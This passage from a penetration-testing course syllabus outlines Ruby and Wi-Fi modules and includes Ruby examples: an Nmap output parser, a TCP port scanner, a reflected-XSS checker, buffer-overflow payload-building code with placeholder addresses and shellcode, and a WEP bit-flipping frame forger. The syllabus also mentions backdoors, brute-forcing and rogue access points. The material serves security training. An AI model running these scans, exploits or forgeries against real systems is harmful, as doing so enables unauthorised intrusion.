4.1.7. More about classes
4.1.8. Open classes
4.1.9. Operator methods
4.1.10. Mutable/Immutable values
4.2. Method visibility
4.2.1. Private methods
4.2.2. Protected methods
4.2.3. A full view
4.3. Subclassing & Inheritance
4.3.1. Simple extensions
4.3.2. Methods overriding
4.3.3. Specialize a method
4.3.4. Instance and Class Variables
4.3.5. Constants
4.3.6. Private methods
4.3.7. Protected methods
4.4. Modules
4.4.1. Namespace
4.4.2. Mixin
4.4.2.1. Namespace and Mixin
4.5. Exception
4.5.1. Raise
4.5.1.1. RuntimeError
4.5.1.2. Other Errors
4.5.1.3. CustomError
4.5.2. Rescue
4.5.2.1. Simple Rescue
4.5.2.2. Exception Objects
4.5.2.3. Type based Exception handling
4.5.2.4. Rescue as a statement modifier
4.5.3. Other clauses
4.5.3.1. retry
4.5.3.2. else
4.5.3.3. ensure
4.5.4. Methods, Classes and Modules
4.6. Conclusion
4.6.1. The point
4.6.2. Ruby is much more

Downloadable scripts are included in this module.

Module 5: Pentesters Prerequisites

5. Pentesters Prerequisites

Ruby is a very powerful programming language and, thanks to its many features, it can be used for many different purposes.

From this module on, we will focus on how to use Ruby for penetration testing purposes. One of the first topics we will cover is regular expressions.

Regex is widely used in the security field; it is used to find and locate important information stored in files, web pages, network communications and so on.

A good knowledge of how to use and define regex is a 'must' for a penetration tester!

During the study of this module, the student will also learn how to use the date and time classes, as well as how to manage and interact with files and directories: read, delete, create and so on.

5.1. Regular expressions
5.1.1. Basic concepts
5.1.1.1. A quick example
5.1.1.2. Regexp object
5.1.1.3. Regexp modifiers
5.1.1.4. Match method
5.1.1.5. Special characters
5.1.2. Regular Expressions Syntax
5.1.2.1. Character classes
5.1.2.2. Sequences
5.1.2.3. Alternatives
5.1.2.4. Groups
5.1.2.5. Repetition
5.1.2.6. Anchors
5.1.2.7. A real world example
5.1.2.8. More about regexp
5.1.3. Regular expressions in Ruby
5.1.3.1. Global Variables
5.1.3.2. Working with strings
5.2. Dates and time
5.2.1. Time class
5.2.1.1. Create a time instance
5.2.1.2. Components of a time
5.2.1.3. Predicates and conversions
5.2.1.4. Arithmetic
5.2.1.5. Comparisons
5.2.1.6. From time to string
5.2.2. Other classes
5.3. Files and Directories
5.3.1. Directories
5.3.1.1. Current Directory
5.3.1.2. Change Directory
5.3.1.3. Creation / Deletion
5.3.1.4. Directory Listings
5.3.1.5. Testing Directories
5.3.1.6. Dir Objects
5.3.1.7. Example: Windows application directory listing
5.3.2. Files
5.3.2.1. Testing Files
5.3.2.2. Working with names
5.3.2.3. Create/Delete/Rename
5.3.2.4. Change permissions
5.4. Conclusion

Downloadable scripts are included in this module.

Module 6: Input / Output

6. Input / Output

In this module, the student will learn how to use different input and output mechanisms and techniques in order to find (read) or store (write) information to and from files.

We will see several examples and scripts that can be used in conjunction with other tools (e.g. Nmap) in order to gather, filter and store important information.

6.1. File Stream
6.1.1. Reading from a file
6.1.2. Writing to a file
6.2. Working with Nmap Files
6.2.1. IP extraction
6.2.1.1. Normal format
6.2.1.2. Grepable format
6.2.1.3. XML format
6.2.1.4. All together
6.2.2. Open port extraction
6.2.2.1. Normal format
6.2.2.2. Grepable format
6.2.2.3. XML format
6.2.2.4. All together
6.3. Conclusion

Downloadable scripts are included in this module.
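
The following Ruby script is an added example, not one of the course's downloadable scripts. It ties the regular expressions of Module 5 to the Nmap parsing of Module 6: it extracts live hosts and open ports from Nmap grepable (-oG) output, and shows why a plain "find every IP address" regex is not enough. The scan output in SAMPLE_GNMAP is constructed for the example, and the function names are the example's own.

```ruby
# Added example: parse Nmap grepable (-oG) output with regular expressions.
# SAMPLE_GNMAP is a constructed sample, not output from a real scan.
SAMPLE_GNMAP = <<~GNMAP
  # Nmap 6.47 scan initiated Mon Jan  6 10:00:00 2014 as: nmap -sV -oG scan.gnmap 10.0.0.0/28
  Host: 10.0.0.5 (host5.example.lan)\tStatus: Up
  Host: 10.0.0.5 (host5.example.lan)\tPorts: 22/open/tcp//ssh//OpenSSH 6.6/, 80/open/tcp//http//nginx/, 443/closed/tcp//https///\tIgnored State: filtered (997)
  Host: 10.0.0.9 ()\tStatus: Up
  Host: 10.0.0.9 ()\tPorts: 3389/open/tcp//ms-wbt-server//Microsoft Terminal Service/\tIgnored State: closed (999)
  # Nmap done at Mon Jan  6 10:00:42 2014 -- 16 IP addresses (2 hosts up) scanned in 42.00 seconds
GNMAP

# Dotted-quad IPv4 address (each octet 0-255).
IPV4 = /\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b/

# "Host: <ip> (<hostname>)" prefix shared by every host line in -oG output.
HOST_LINE = /\AHost:\s+(?<ip>#{IPV4.source})\s+\((?<hostname>[^)]*)\)/

# One entry of the Ports: field: port/state/proto/owner/service/rpc/version/
PORT_ENTRY = %r{\A(?<port>\d+)/(?<state>[^/]*)/(?<proto>[^/]*)/[^/]*/(?<service>[^/]*)/[^/]*/(?<version>[^/]*)/}

# Format-agnostic extraction: every IPv4 address in the text, in order of
# first appearance. Note that it also picks up the scanned range (10.0.0.0),
# which is why the structured parser below is preferable for -oG files.
def extract_ips(text)
  text.scan(IPV4).uniq
end

# Structured parse of grepable output: { ip => { hostname:, ports: [...] } }
def parse_gnmap(text)
  hosts = {}
  text.each_line do |line|
    next if line.start_with?('#')
    m = HOST_LINE.match(line) or next
    entry = (hosts[m[:ip]] ||= { hostname: nil, ports: [] })
    entry[:hostname] = m[:hostname] unless m[:hostname].empty?
    ports_field = line[/\tPorts:\s+([^\t\n]*)/, 1] or next
    ports_field.split(/,\s*/).each do |raw|
      pm = PORT_ENTRY.match(raw) or next
      entry[:ports] << { port: pm[:port].to_i, state: pm[:state],
                         proto: pm[:proto], service: pm[:service],
                         version: pm[:version] }
    end
  end
  hosts
end

# Hosts that Nmap reported at all (i.e. that were up).
def live_ips(text)
  parse_gnmap(text).keys
end

# { ip => [open ports] } for one protocol; hosts with nothing open are omitted.
def open_ports(text, proto: 'tcp')
  parse_gnmap(text).each_with_object({}) do |(ip, entry), out|
    open = entry[:ports].select { |p| p[:state] == 'open' && p[:proto] == proto }
    out[ip] = open.map { |p| p[:port] } unless open.empty?
  end
end

if __FILE__ == $PROGRAM_NAME
  text = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_GNMAP
  open_ports(text).each { |ip, ports| puts "#{ip}: #{ports.join(', ')}" }
end
```

Run it with the path of a real -oG file as the first argument; without one it parses the embedded sample. The grepable format separates fields with tabs and port entries with commas, so the parser anchors on those separators rather than on whitespace.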

Module 7: Network and OS Interaction

7. Network and OS Interaction

Another very important topic that a penetration tester should master is network communication.

In this module, the student will learn how to use the power of Ruby in order to create, forge and intercept network communications.

Thanks to many useful examples and scripts, the student will learn how to create raw sockets, forge packets, create TCP/UDP scanners and much more.

In the second part of this module, we will also see how to interact with local and remote Operating Systems. This, in conjunction with the network communication skills, may be useful to create powerful tools (e.g. backdoors that are able to retrieve information from remote systems, as well as send and run specific commands).

7.1. The network
7.1.1. Socket Basics
7.1.1.1. TCP client
7.1.1.1.1. RFC868
7.1.1.1.2. Connection
7.1.1.1.3. Handle the result
7.1.1.1.4. Sockets and blocks
7.1.1.1.5. A Wireshark view
7.1.1.1.6. More about
7.1.1.2. UDP client
7.1.1.2.1. RFC868
7.1.1.2.2. Datagram sending/receiving
7.1.1.2.3. Handle the result
7.1.1.2.4. A Wireshark view
7.1.1.2.5. UDP behaviour
7.1.1.2.6. More about
7.1.1.3. TCP Client/Server service
7.1.1.3.1. The Server
7.1.1.3.2. The Client
7.1.1.3.3. Execution
7.1.2. Penetration testing activities
7.1.2.1. Ping sweep
7.1.2.1.1. Net-Ping Gem
7.1.2.1.2. The script
7.1.2.2. TCP Connection Port scan
7.1.2.2.1. The strategy
7.1.2.2.2. The script
7.1.2.3. UDP Port scan
7.1.2.3.1. The strategy
7.1.2.3.2. The script
7.1.3. Raw Sockets
7.1.3.1. PacketFu
7.1.3.1.1. Installation
7.1.3.1.2. Usage
7.1.3.1.3. Forge a custom packet
7.1.3.1.4. Forge a packet (the best way)
7.1.3.2. TCP SYN port scanner
7.1.3.2.1. The strategy
7.1.3.2.2. The script
7.1.4. Conclusion
7.2. OS interactions
7.2.1. Kernel exec
7.2.2. Kernel system
7.2.3. Kernel backticks
7.2.4. IO popen
7.2.5. Open3 popen3
7.2.6. All together

Downloadable scripts are included in this module.

Hera Labs are included in this module.
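
As an added example (not the course's own scanner script), the Ruby below implements the TCP connect port scan strategy of 7.1.2.2 with the standard socket library only: each port is probed with a full connect(), refused connections are reported as closed and silence as filtered, and a small thread pool works through a queue of ports. The demo_scan helper and its loopback listener are the example's own scaffolding so that it runs without a remote target.

```ruby
require 'socket'

# Added example: TCP connect() port scanner, the strategy behind 7.1.2.2.
# A full three-way handshake is completed for every probed port, so the
# target's application log will usually record each connection; the SYN
# scanner of 7.1.3.2 avoids that by never completing the handshake.

# Probe one port. :open when connect() succeeds, :closed on a RST
# (ECONNREFUSED), :filtered when nothing answers or the host is unreachable.
def probe_tcp_port(host, port, timeout: 1.0)
  Socket.tcp(host, port, connect_timeout: timeout) { :open }
rescue Errno::ECONNREFUSED
  :closed
rescue SystemCallError, SocketError, IOError
  :filtered
end

# Scan a list of ports with a pool of worker threads; returns { port => state }
# sorted by port number.
def tcp_connect_scan(host, ports, threads: 16, timeout: 1.0)
  queue = Queue.new
  ports.each { |p| queue << p }
  queue.close                       # pop returns nil once the queue is drained
  results = {}
  lock = Mutex.new
  Array.new([threads, ports.size].min) do
    Thread.new do
      while (port = queue.pop)
        state = probe_tcp_port(host, port, timeout: timeout)
        lock.synchronize { results[port] = state }
      end
    end
  end.each(&:join)
  results.sort.to_h
end

# Self-contained demonstration: one listener on the loopback interface plus a
# port we know nothing listens on (bound and released just before the scan).
def demo_scan
  listener = TCPServer.new('127.0.0.1', 0)    # port 0 = let the OS pick one
  spare = TCPServer.new('127.0.0.1', 0)
  open_port, closed_port = listener.addr[1], spare.addr[1]
  spare.close
  { open_port: open_port, closed_port: closed_port,
    results: tcp_connect_scan('127.0.0.1', [open_port, closed_port], threads: 2) }
ensure
  listener&.close
end

if __FILE__ == $PROGRAM_NAME
  host = ARGV[0] || '127.0.0.1'
  ports = ARGV[1] ? ARGV[1].split(',').map(&:to_i) : (1..1024).to_a
  tcp_connect_scan(host, ports).each do |port, state|
    puts "#{port}/tcp #{state}" if state == :open
  end
end
```

Usage: `ruby scan.rb 10.0.0.5 22,80,443`; with no arguments it scans ports 1-1024 on the loopback interface. The connect timeout is what separates :filtered from :closed, so lower it on a LAN and raise it across the Internet.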

Module 8: The Web

8. The Web

In the previous module, the student studied network communications and local interactions with the OS. Now it is time to focus on Web Applications.

We will see how to create and intercept HTTP and HTTPS requests and responses, as well as how to send/read GET and POST parameters and much more.

Along with these topics, the student will also be presented with some useful scripts and use cases that can be used to run attacks against web applications or to identify vulnerabilities such as XSS.

8.1. Starting point
8.1.1. HTTP Protocol
8.1.2. Ruby's alternatives
8.1.2.1. Using simple socket
8.1.2.2. Net::HTTP library
8.1.2.3. Open-uri library
8.1.2.4. URI object
8.2. Request & Response
8.2.1. Net::HTTP class and instances
8.2.2. GET
8.2.2.1. Net::HTTP get
8.2.2.2. Net::HTTP get_response
8.2.2.3. HTTPResponse object
8.2.2.3.1. Status
8.2.2.3.2. Headers
8.2.2.3.3. Body
8.2.2.3.4. Response object types
8.2.2.4. Parameters
8.2.2.4.1. URL encapsulation
8.2.2.4.2. Dynamic parameters
8.2.2.5. Net::HTTP instances
8.2.2.5.1. Using get instance method
8.2.2.5.2. Using Http::Get request object
8.2.2.5.3. URI and parameters
8.2.2.6. Request Headers
8.2.2.6.1. Using get instance method
8.2.2.6.2. Using Http::Get request object
8.2.2.7. Working with Open-uri
8.2.2.7.1. Open method
8.2.2.7.2. Request Headers
8.2.3. POST
8.2.3.1. Using Net::HTTP post_form
8.2.3.1.1. Sessions and Cookies
8.2.3.2. Using Http::Post request object
8.2.3.3. Request Headers
8.2.3.3.1. Using post instance method
8.2.3.3.2. Using Http::Post request object
8.2.3.4. Example: Post flooding
8.2.4. Persistent Connections
8.2.4.1. Example: Bruteforce login form
8.2.4.1.1. Response identification
8.2.4.1.2. Find a UserName
8.2.4.1.3. Using a dictionary
8.2.4.1.4. Using a string generator
8.2.5. HTTPS
8.2.6. Redirections
8.2.6.1. Identification
8.2.6.2. Follow the chain
8.2.7. Proxies
8.2.7.1. HTTP Proxies
8.2.7.2. HTTPS Proxies
8.2.8. Other Verbs
8.2.8.1. OPTIONS
8.2.8.2. HEAD
8.2.8.3. Others
8.2.9. Conclusion
8.3. Data extraction
8.3.1. Regular Expressions
8.3.1.1. Example: email extraction
8.3.2. Document Parsing
8.3.2.1. Nokogiri
8.3.2.1.1. Installation
8.3.2.1.2. Documentation & Tutorials
8.3.2.2. Example: Form extraction
8.3.2.3. Example: Detect Reflected XSS
8.3.2.3.1. Using the interpreter
8.3.2.3.2. A simple tool
8.4. Exercises
8.4.1. CMS detection
8.4.2. Hidden files
8.4.3. Indexing & Crawling
8.4.4. Subdomain enumeration

Downloadable scripts are included in this module.

Hera Labs are included in this module.
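
As an added example (not the course's "simple tool" from 8.3.2.3), the Ruby below combines a Net::HTTP GET with dynamic parameters (8.2.2.4) and a reflected XSS check: it appends a probe value containing the characters an HTML encoder must neutralise, requests the page and reports whether the probe came back verbatim, HTML-encoded, or not at all. The tiny in-process HTTP server is constructed for the example so that it runs offline and stands in for a target; the function names are the example's own.

```ruby
require 'socket'
require 'net/http'
require 'uri'
require 'cgi'

# Added example: GET with a probe parameter plus reflected XSS classification.
# The echo server below is a constructed stand-in, not a real application.

# Probe string: contains the characters an HTML encoder must neutralise.
PROBE = %q{els"'<>probe}

# :unescaped     - the probe came back verbatim (reflected XSS candidate)
# :escaped       - it came back HTML-encoded (the app encodes its output)
# :not_reflected - the parameter value does not appear in the page at all
def reflection_state(body, probe = PROBE)
  if body.include?(probe)                    then :unescaped
  elsif body.include?(CGI.escapeHTML(probe)) then :escaped
  else :not_reflected
  end
end

# Append param=probe to the query string of base_url (keeping any parameters
# already there), request it with Net::HTTP and classify the response.
def check_reflected_xss(base_url, param, probe: PROBE)
  uri = URI(base_url)
  query = URI.decode_www_form(uri.query || '') << [param, probe]
  uri.query = URI.encode_www_form(query)
  res = Net::HTTP.get_response(uri)
  { status: res.code.to_i, param: param, state: reflection_state(res.body, probe) }
end

# Stand-in target (constructed for this example): echoes the "q" parameter.
# /search writes it into the page raw, /safe HTML-encodes it first.
# Returns the port it listens on.
def start_echo_server
  server = TCPServer.new('127.0.0.1', 0)
  Thread.new do
    loop do
      client = server.accept
      request_line = client.gets
      if request_line
        path = request_line.split[1] || '/'
        nil while (h = client.gets) && h != "\r\n"   # discard request headers
        req = URI.parse("http://localhost#{path}")
        q = URI.decode_www_form(req.query || '').to_h.fetch('q', '')
        shown = req.path == '/safe' ? CGI.escapeHTML(q) : q
        body = "<html><body><h1>Results for #{shown}</h1></body></html>"
        client.write "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n" \
                     "Content-Length: #{body.bytesize}\r\nConnection: close\r\n\r\n#{body}"
      end
      client.close
    end
  end
  server.addr[1]
end

if __FILE__ == $PROGRAM_NAME
  port = start_echo_server
  %w[/search /safe].each do |path|
    puts "#{path}: #{check_reflected_xss("http://127.0.0.1:#{port}#{path}", 'q')}"
  end
end
```

The check deliberately looks for the probe's encoded form as well as the raw one: a parameter that comes back as `els&quot;&#39;&lt;&gt;probe` is reflected but handled correctly, and reporting it as a finding would be a false positive. A verbatim reflection is a candidate, not a confirmed vulnerability, until the injection context (attribute, script block, body) has been checked.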

Module 9: Exploitation with Ruby

9. Exploitation with Ruby

During the study of the previous modules, the student should have acquired many Ruby programming skills.

It is time to take advantage of these skills and use Ruby to write exploits for vulnerable services and software.

In this module, we will present a vulnerable application that the student can use to learn how to write a full working exploit.

9.1. ELS Echo Server
9.1.1. The service
9.1.2. Bug detection
9.2. The Exploit
9.2.1. Identify the buffer overflow space
9.2.1.1. Fuzzing
9.2.1.2. Using a debugger
9.2.2. Writing the payload
9.2.2.1. Preamble
9.2.2.2. Return address
9.2.2.3. The payload
9.2.3. Exploitation
9.2.3.1. The full code
9.2.3.2. Exploit
9.2.4. Shell on the victim
9.2.4.1. Create the payload
9.2.4.2. Write the script
9.2.4.3. Exploitation
9.3. Conclusion

Downloadable scripts are included in this module.

Hera Labs are included in this module.
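
As an added example (not the course's ELS Echo Server exploit), the Ruby below implements the building blocks that 9.2.1 and 9.2.2 list: a cyclic pattern to fuzz the service with, the lookup that turns the EIP value read in the debugger into the offset of the return address, and the assembly of preamble, return address, NOP sled and shellcode into the final buffer. The return address 0x7c9d30d7, the EIP value 0x37634136 and the "\xcc" placeholder shellcode are made-up illustrations; send_buffer is the example's own delivery helper and is not exercised against any real service here.

```ruby
require 'socket'

# Added example: pieces of a classic stack overflow exploit written in Ruby.
# All addresses and the shellcode are placeholders; nothing targets a real service.

# Cyclic pattern in the Metasploit pattern_create style: "Aa0Aa1Aa2...". Every
# 4-byte window is unique within the first 20280 bytes, so the bytes that land
# in EIP tell exactly where in the buffer they came from.
def pattern_create(length)
  out = ''.b
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.bytesize >= length
      end
    end
  end
  out[0, length]
end

# The debugger shows EIP as a little-endian dword (0x37634136 is "6Ac7" in
# memory); locate that window in the pattern to get the offset to EIP, or nil.
def pattern_offset(eip_value, length = 20280)
  pattern_create(length).index([eip_value].pack('V'))
end

# junk up to EIP | return address (little-endian) | NOP sled | shellcode | filler
# total, when given, pads the buffer to the same size used while fuzzing so the
# stack layout does not shift between the crash and the exploit.
def build_payload(offset:, ret_addr:, shellcode:, nop_sled: 16, total: nil)
  buf = 'A'.b * offset
  buf << [ret_addr].pack('V')
  buf << ("\x90".b * nop_sled)
  buf << shellcode.b
  buf << ('C'.b * (total - buf.bytesize)) if total && total > buf.bytesize
  buf
end

# Deliver a buffer to a TCP service and return whatever it answers within
# read_timeout seconds (nil on silence or a dropped connection, which for an
# echo service is itself a sign the process crashed).
def send_buffer(host, port, buf, read_timeout: 3)
  TCPSocket.open(host, port) do |s|
    s.write(buf)
    next nil unless IO.select([s], nil, nil, read_timeout)
    s.readpartial(4096)
  end
rescue EOFError, Errno::ECONNRESET
  nil
end

if __FILE__ == $PROGRAM_NAME
  # 1. fuzz:     send_buffer(host, port, pattern_create(1000))
  # 2. debugger: EIP reads 0x37634136 (hypothetical) -> offset 80
  offset = pattern_offset(0x37634136)
  # 3. build:    hypothetical JMP ESP address, placeholder shellcode
  payload = build_payload(offset: offset, ret_addr: 0x7c9d30d7,
                          shellcode: "\xcc".b * 32, total: 1000)
  puts "offset=#{offset} payload=#{payload.bytesize} bytes"
end
```

Everything is built on binary (ASCII-8BIT) strings so that `bytesize` and string slicing count bytes, not characters; mixing in a UTF-8 literal that contains bytes above 0x7f would silently change the length of the buffer.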

Module 10: Metasploit

10. Metasploit

Now that the student has mastered Ruby and its features, it is time to start working with one of the most powerful Ruby tools: Metasploit.

In this module, the student will study the Metasploit architecture and framework, and will learn how to create, add or edit custom Metasploit modules.

Thanks to our virtual labs, the student will also have the chance to practice against real vulnerable machines.

10.1. Introduction
10.2. ELS Echo Server
10.2.1. The service
10.2.2. The vulnerability
10.2.3. Exploitation with Metasploit
10.3. Architecture and Framework
10.3.1. Architecture
10.3.1.1. A snapshot
10.3.1.2. Files and Folders
10.3.2. Interfaces
10.3.2.1. MSFConsole
10.3.2.2. MSFCli
10.3.2.3. Web interface
10.3.2.4. Others
10.3.3. Libraries
10.3.3.1. Rex
10.3.3.2. Core Library
10.3.3.3. Base Library
10.3.4. Modules
10.3.4.1. Exploits
10.3.4.2. Auxiliary
10.3.4.3. Payloads
10.3.4.4. Nops, Encoders
10.3.4.5. Post
10.3.4.6. The point
10.3.5. Plugins
10.3.6. Tools
10.3.7. Some considerations
10.4. Explore and write the ELS Echo module
10.4.1. Module type and location
10.4.2. Module high level structure
10.4.3. Module Information
10.4.4. The check method
10.4.5. The exploit method
10.4.6. Targets considerations
10.4.7. Conclusion
10.5. Meterpreter scripting
10.5.1. Meterpreter Basic API
10.5.2. Meterpreter scripts

Downloadable scripts are included in this module.

Hera Labs are included in this module.


Wi-Fi Section
The Wi-Fi Security section is an extremely in-depth section covering all the
most important attack techniques used against Wi-Fi networks. The student
will learn the security mechanisms implemented in Wi-Fi architectures as
well as their weaknesses and how to exploit them.

- Module 1: Prerequisites
- Module 2: Environment setup
- Module 3: Wireless Standards and Networks
- Module 4: Discover Wi-Fi Networks
- Module 5: Traffic Analysis
- Module 6: Attacking Wi-Fi Networks
- Module 7: Wi-Fi as attack vector

Module 1: Prerequisites

1. Prerequisites

In the first module of the Wi-Fi section, we will see the hardware and software prerequisites of the course.

1.1. Software
1.2. Hardware
1.2.1. Antennas
1.2.2. A note on signal strength
1.2.3. Conclusions

Module 2: Environment setup

2. Environment setup

In this module, the student will learn how to properly configure the test environment in order to obtain the best outcome from the following modules.

2.1. Introduction
2.1.1. Considerations on Linux drivers
2.2. Adapter configuration
2.2.1. Testing your setup

Module 3: Wireless Standards and Networks

3. Wireless Standards and Networks

In this module, the student will learn the basic concepts underlying Wi-Fi infrastructures.

We will see which types of Wi-Fi configurations exist, how they work and which security features and mechanisms are implemented.

We will also present an overview of the most important flaws that affect different types of wireless infrastructures and protocols.

3.1. IEEE 802.11 Standards
3.2. Types of Wireless Network
3.2.1. Infrastructure Network
3.2.2. Ad-Hoc Network
3.3. Wireless Frames
3.3.1. Management Frames
3.3.1.1. Beacon
3.3.1.2. Probe requests
3.3.1.3. Probe responses
3.3.1.4. Authentication
3.3.1.5. Association request
3.3.1.6. Association response
3.3.1.7. Disassociation frame
3.3.1.8. Deauthentication frame
3.3.1.9. Reassociation request/response
3.4. Security Features
3.4.1. Encryption
3.4.1.1. WEP
3.4.1.1.1. Initialization vector
3.4.1.1.2. RC4
3.4.1.1.3. Integrity Check Value
3.4.1.2. WEP flaws
3.4.1.2.1. Birthday paradox
3.4.1.2.2. Keystream reuse
3.4.1.2.3. Known plaintext attack
3.4.1.2.4. CRC-32
3.4.1.2.5. Bit-flipping attack
3.4.1.2.6. FMS attack
3.4.1.2.7. KoreK
3.4.1.2.8. PTW
3.4.1.3. WPA
3.4.1.3.1. Temporal Key Integrity Protocol
3.4.1.3.2. CCMP/AES
3.4.1.4. WPA2
3.4.2. Authentication
3.4.2.1. Open System
3.4.2.2. Shared Key Authentication

Downloadable scripts are included in this module.
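
As an added example (not one of the course's scripts), the Ruby below shows why 3.4.1.2.4 and 3.4.1.2.5 belong together: WEP's Integrity Check Value is a CRC-32, which is affine over GF(2), so an attacker who knows or guesses part of a frame's plaintext can flip exactly those bits in the ciphertext and patch the encrypted ICV without ever learning the key. The key, IV and frame body are made-up values; the RC4 and WEP framing are the textbook constructions reduced to what the attack needs, without 802.11 headers or the key index byte.

```ruby
require 'zlib'

# Added example: WEP bit-flipping against the CRC-32 ICV. Key, IV and the
# frame body are constructed values; the RC4/WEP code is the textbook scheme
# stripped of the 802.11 headers.

# RC4 keystream of n bytes for the given key (KSA + PRGA).
def rc4_keystream(key, n)
  s = (0..255).to_a
  k = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + k[i % k.size]) & 0xff
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  Array.new(n) do
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    s[(s[i] + s[j]) & 0xff]
  end.pack('C*')
end

def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# Sender: ICV = CRC-32(plaintext); frame = IV || RC4(IV||key) XOR (plaintext || ICV)
def wep_encrypt(iv, key, plaintext)
  data = plaintext.b + [Zlib.crc32(plaintext)].pack('V')
  iv.b + xor_bytes(data, rc4_keystream(iv + key, data.bytesize))
end

# Receiver: strip the IV, decrypt, verify the ICV; plaintext or nil on failure.
def wep_decrypt(key, frame)
  iv, body = frame[0, 3], frame[3..]
  data = xor_bytes(body, rc4_keystream(iv + key, body.bytesize))
  plaintext, icv = data[0...-4], data[-4..]
  Zlib.crc32(plaintext) == icv.unpack1('V') ? plaintext : nil
end

# Attacker, no key needed. CRC-32 is affine over GF(2):
#   crc(p ^ d) == crc(p) ^ crc(d) ^ crc("\0" * len)
# so XORing the ciphertext with d || (crc(d) ^ crc(zeros)) changes the
# plaintext by d and leaves the ICV valid. delta must be as long as the
# plaintext, with zero bytes wherever nothing should change.
def wep_bit_flip(frame, delta)
  iv, body = frame[0, 3], frame[3..]
  zeros = "\0".b * delta.bytesize
  icv_delta = [Zlib.crc32(delta) ^ Zlib.crc32(zeros)].pack('V')
  iv + xor_bytes(body, delta + icv_delta)
end

# Build delta from what the attacker believes the plaintext is and what it
# should become (same length). Unchanged bytes XOR to zero.
def make_delta(known, wanted)
  raise ArgumentError, 'lengths differ' unless known.bytesize == wanted.bytesize
  xor_bytes(known, wanted)
end

if __FILE__ == $PROGRAM_NAME
  key = "\x01\x02\x03\x04\x05".b            # made-up 40-bit WEP key
  frame = wep_encrypt("\x0a\x0b\x0c".b, key, 'GET /admin?user=guest HTTP/1.0')
  forged = wep_bit_flip(frame, make_delta('GET /admin?user=guest HTTP/1.0',
                                          'GET /admin?user=root  HTTP/1.0'))
  puts wep_decrypt(key, forged).inspect    # the receiver accepts the altered frame
end
```

The same linearity is what makes keystream reuse (3.4.1.2.2) so damaging: once one plaintext/ciphertext pair under a given IV is known, the attacker has that IV's keystream and can forge arbitrary frames of that length, ICV included. A keyed MAC such as the MIC in TKIP or the CBC-MAC in CCMP does not have this property, which is why WPA/WPA2 are not vulnerable to this attack.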

Module 4: Discover Wi-Fi Networks

4. Discover Wi-Fi Networks

The first step when running a penetration test against Wi-Fi networks is to discover and identify the target.

In this module, we will see how to do this through a series of tools available for different platforms.

4.1. Tools
4.1.1. inSSIDer
4.1.2. Kismet
4.1.3. Airodump-ng
4.2. Hidden SSID
4.2.1. Network de-cloaking

Downloadable exercises are included in this module.

Module 5: Traffic Analysis

5. Traffic Analysis

After the target network has been identified, the next step is to configure our tools in order to sniff and intercept the traffic.

This is a very important step for all the attacks that come afterwards.

5.1. Capturing traffic
5.2. Monitor mode
5.3. Channel Hopping
5.4. Wireshark filters
5.5. Traffic decryption

Downloadable exercises are included in this module.

Module 6: Attacking Wi-Fi Networks

6. Attacking Wi-Fi Networks

This module focuses on the attacks that can be executed against Wi-Fi networks.

The student will learn how to attack and access remote Wi-Fi networks, obtain keys and passwords, and much more, depending on their configuration and security mechanisms.

We will first explore the attacks against WEP and then focus our tests on more secure networks: WPA, WPA2 and WPS.

6.1. WEP
6.1.1. Overview and Setup
6.1.2. Deauthentication attack
6.1.3. ARP replay attack
6.1.4. Cracking the key with aircrack-ng
6.1.4.1. Running the PTW attack with aircrack-ng
6.1.4.2. KoreK attack
6.1.5. Clientless WEP cracking
6.1.6. Bypassing Shared Key Authentication
6.1.7. Attacking the client
6.1.7.1. Caffe-Latte overview
6.1.7.2. Practical Caffe-Latte attack
6.2. WPA and WPA2
6.2.1. The Four-Way Handshake
6.2.2. Capture the handshake
6.2.3. Using aircrack-ng against the handshake
6.2.3.1. Build a wordlist with crunch
6.2.3.2. A note on cracking speed
6.2.4. Exploit the GPU power
6.2.4.1. oclHashcat
6.2.5. Cracking as a Service
6.2.5.1. CloudCracker
6.2.6. Space-time tradeoff
6.2.6.1. Pyrit
6.2.6.2. Pre-built hash files
6.3. WPS
6.4. Conclusions

Downloadable exercises are included in this module.

Module 7: Wi-Fi as an attack vector

7. Wi-Fi as an attack vector

In the last module of the Wi-Fi section, the student will learn how to use Wi-Fi as an attack vector.

This means that we will not attack Wi-Fi networks; instead we will use Wi-Fi in order to create fake networks, obtain credentials, run MitM attacks and much more.

7.1. Rogue AP
7.1.1. A typical Rogue AP scenario
7.1.2. Recover PRGA with a rogue AP
7.1.3. Initiate a WPA/WPA2 handshake
7.1.4. Man in the Middle attack
7.2. Wardriving

About eLearnSecurity

A leading innovator in the field of practical, hands-on IT security training.

Based in Pisa (Italy), Dubai (UAE) and in San Jose (USA), eLearnSecurity is a
leading provider of IT security and penetration testing courses including
certifications for IT professionals.

eLearnSecurity's mission is to advance the career of IT security professionals by providing affordable and comprehensive education and certification. All eLearnSecurity courses utilize engaging eLearning and the most effective mix of theory, practice and methodology in IT security - all with real-world lessons that students can immediately apply to build relevant skills and keep their organization's data and systems safe.

© 2014 eLearnSecurity S.R.L


Via Matteucci 36/38
56124 Pisa, Italy

For more information, please visit http://www.elearnsecurity.com.
